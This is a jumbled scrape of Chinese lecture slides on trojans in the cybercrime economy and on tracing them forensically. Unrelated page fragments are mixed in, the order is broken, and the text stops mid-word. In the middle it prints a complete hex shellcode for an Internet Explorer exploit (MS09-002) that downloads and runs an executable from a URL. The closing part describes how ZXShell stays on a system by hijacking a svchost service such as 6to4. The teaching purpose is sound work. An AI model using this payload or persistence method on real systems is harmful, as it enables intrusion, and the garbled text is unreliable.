PPT木马在黑色产业链中的地位及其取证方法课稿.pptVIP

企业荣誉 执行完bp send断点命令之后，我们就可以网络数据包发送。下面我们就来控制一下木马服务端的数据发送 对网络传输是加密的数据包，可以采取比较加密之后的数据包，来确定是不是木马的服务端发送出来的。如果你还想知道数据包加密前是什么样，你可以在刚才提到的数据包的内存地址的位置上，设置硬件断点，就可以得到数据包在加密之前的样子 Hr工作时间表 * 木马在黑色产业链中的地位及其取证方法 木马在黑色产业链中的地位 攻击之后的自我保护及木马溯源技术 现代木马技术 第一部分 木马在黑色产业链中的地位 木马在黑色产业链中具有重要地位 网站挂马是如何做为木马传播的一种重要手段 案例: 可以被黑客利用的IE漏洞 MPEG-2 MS09-002 MS09-02 漏洞实例: 利用shellcode实现攻击过程 下面这张图,就是一个真正的shellcode 把shellcode变成机器码b0f5b33c966b980018033ef43e2faeb05e8ecffffff7f8b4edfefefef64afe3649ff342649fe76e03efebefef6403b98761a1e1030711efefef66aaebb987771165e1071fefefef66aae7b987ca5f102d070defefef66aae38f073befefef66aaffb9872e960a570729efefef66aafbaf6fd72c9a1566aaf706e8eeefefb1669acb64aaeb85eeb664baf7b90764efefefbf87d9f5c09f0778efefef66aaf3642a6c2fbf66aacf8710efefefbf64aafb85edb664baf7078eefefefecaacf28efb391c18a28afeb978aefef109acf64aae385eeb664baf707afefefef85e8b7ecaacbdc34bcbc109acfbfbc64aaf385eab664baf707ccefefef85ef109acf64aae785edb664baf707ffefefef851064aaff85eeb664baf707efefefefaeb4bdec0eec0eec0eec0e6c03ebb5bc64350d18bd100fb764b2e3b9649cd3649bf197ec1cb96499cfec1cdc26a6ae42ec2cb9dc19e051ffd51d9be72e21e2ec1daf041ed411b19a0ab5640464b5cbec328964e3a464b5f3ec3264eb64ec2ab1b22de7ef071b111010babda3a2a0a1ef687474703A2F2F3132372E302E302E312F4A78662E6578650000 机器码很难看吧,让我们看看,这些机器码对应的是什么代码 第二部分 攻击之后的自我保护及木马溯源技术 国内关于电子取证的现状(国家信息中心电子数据司法鉴定中心 ) 木马的取证关键是它的溯源,找出谁在”搞”我们 木马的溯源相关资料 /view/9b8c7dd5360cba1aa811daf8.html 启动方式： 在系统中加入了服务启动项，把启动文件直接指向在windows\system32中新增加的那个文件。C:\windows\system32\abc.dll。对于服务的名称，远控程序的使用者不能任意指定。服务的名称是由ZXShell程序作者利用一定的方法得到的。 具体的方法是： 程序的作者利用HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost 下面的分组信息netsvcs里面提供的服务名称来决定替换哪一个服务。在我的测试环境中服务是把6to4这个服务给替换掉了。其实，在一般情况远控程序的服务端都会用6to4来进行伪装。因为在netsvcs这个服务分组里，通常情况下6to4都是做为第一个出现的。6to4一个闲置的服务，它是一种自动构造隧道的方式来用一个全球唯一的IPV4的地址，使整个站点得到IPV6的连接。如果替换6to4不成的话，程序接下来尝试用AppMgmt、AudioSrv、Browser、CryptSvc、DMServer、DHCP、ERSvc、EventSystem、FastUserSwitchingCompatibil